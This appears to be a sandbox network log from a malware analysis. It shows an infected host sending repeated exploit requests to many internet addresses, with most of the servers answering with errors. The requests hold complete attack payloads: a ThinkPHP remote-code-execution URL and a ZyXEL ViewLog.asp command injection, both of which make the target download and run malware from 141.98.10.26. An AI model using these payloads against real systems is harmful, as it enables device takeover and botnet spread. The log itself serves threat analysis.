Session ID	Source IP	Source Port	Destination IP	Destination Port
761	192.168.2.23	46426	95.85.185.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.409615040 CET	15724	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
762	192.168.2.23	35634	94.121.64.24	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.464116096 CET	15727	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
763	192.168.2.23	59916	94.123.187.159	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.476075888 CET	15728	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
764	192.168.2.23	33902	112.126.254.14	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.512207985 CET	15739	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:59.831182003 CET	15752	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:18 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
765	192.168.2.23	57828	85.235.80.179	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.514960051 CET	15740	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
766	192.168.2.23	52582	95.214.178.67	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.550858021 CET	15741	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:01.121501923 CET	15884	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.977252960 CET	16128	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:06.912714005 CET	16558	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:14.335638046 CET	17498	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.181526899 CET	19259	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:00.153498888 CET	19778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
767	192.168.2.23	50186	112.48.136.70	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.558274031 CET	15742	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:59.925407887 CET	15756	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:59 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:3 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db04f_PS-XMN-01k8V70_25774-22547 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
Nov 22, 2023 08:40:00.030656099 CET	15761	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:59 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:3 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db04f_PS-XMN-01k8V70_25774-22547 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
Nov 22, 2023 08:40:00.237627029 CET	15766	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:59 GMT Content-Type: text/html Content-Length: 150 Connection: close X-Via: 1.1 PS-XMN-01k8V70:3 (Cdn Cache Server V2.0) Link: https://www.cdnetworks.com/cdn360/; rel="blocked-by" x-ws-request-id: 655db04f_PS-XMN-01k8V70_25774-22547 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
768	192.168.2.23	34328	94.30.1.222	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.649938107 CET	15745	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:59.912106037 CET	15755	IN	HTTP/1.1 401 Unauthorized Content-Type: application/json Content-Length: 48 Date: Wed, 22 Nov 2023 07:41:04 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' Data Raw: 7b 0a 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 49 6e 76 61 6c 69 64 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 50 61 73 73 77 6f 72 64 22 0a 20 7d Data Ascii: { "result": "Invalid Username or Password" }

Session ID	Source IP	Source Port	Destination IP	Destination Port
769	192.168.2.23	36380	94.240.178.209	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.677280903 CET	15746	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
770	192.168.2.23	40656	95.101.4.30	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.800564051 CET	15749	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:59.975306988 CET	15758	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:59 GMT Date: Wed, 22 Nov 2023 07:39:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 39 39 26 23 34 36 3b 32 33 33 31 39 30 33 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8c3f655f.1700638799.23319036</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
771	192.168.2.23	57826	95.101.63.44	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.804522038 CET	15750	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:59.983200073 CET	15759	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:59 GMT Date: Wed, 22 Nov 2023 07:39:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 39 39 26 23 34 36 3b 31 65 34 30 38 64 66 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2c3f655f.1700638799.1e408df3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
772	192.168.2.23	41116	95.100.231.96	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.816782951 CET	15751	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:00.007527113 CET	15760	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:59 GMT Date: Wed, 22 Nov 2023 07:39:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 39 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 39 39 26 23 34 36 3b 31 65 32 38 64 33 38 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.497e19b8.1700638799.1e28d38f</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
773	192.168.2.23	39336	95.230.223.204	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.837285995 CET	15753	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
774	192.168.2.23	34780	95.153.38.14	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.838473082 CET	15753	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:00.051263094 CET	15763	IN	HTTP/1.1 400 Bad Request Server: nginx/1.15.12 Date: Wed, 22 Nov 2023 07:39:59 GMT Content-Type: text/html Content-Length: 158 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 31 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.12</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
775	192.168.2.23	40192	95.86.79.128	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:00.032797098 CET	15761	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
776	192.168.2.23	36408	94.240.178.209	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:00.115283012 CET	15764	IN	HTTP/1.0 400 Bad Request Server: httpd Date: Wed, 22 Nov 2023 07:39:58 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
777	192.168.2.23	50182	112.48.136.70	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:00.579221010 CET	15814	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
